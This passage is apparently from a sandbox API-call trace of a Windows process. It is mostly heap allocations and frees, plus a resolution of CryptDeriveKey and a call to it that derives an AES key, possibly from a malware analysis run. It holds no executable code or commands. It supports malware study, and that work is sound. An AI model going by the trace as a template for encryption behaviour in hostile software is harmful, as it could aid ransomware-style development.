(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0168.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0168.820] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0168.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0168.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0168.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0168.821] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0168.821] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0168.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0168.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.871] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0168.872] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0168.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0168.873] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0168.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0168.873] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0168.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0168.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0168.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0168.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0168.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0168.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf) returned 0x9bd330 [0168.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x9bd330, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0168.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.877] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0168.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0168.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0168.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0168.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0168.878] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0168.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0168.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0168.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0168.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0168.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0168.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0168.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0168.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) 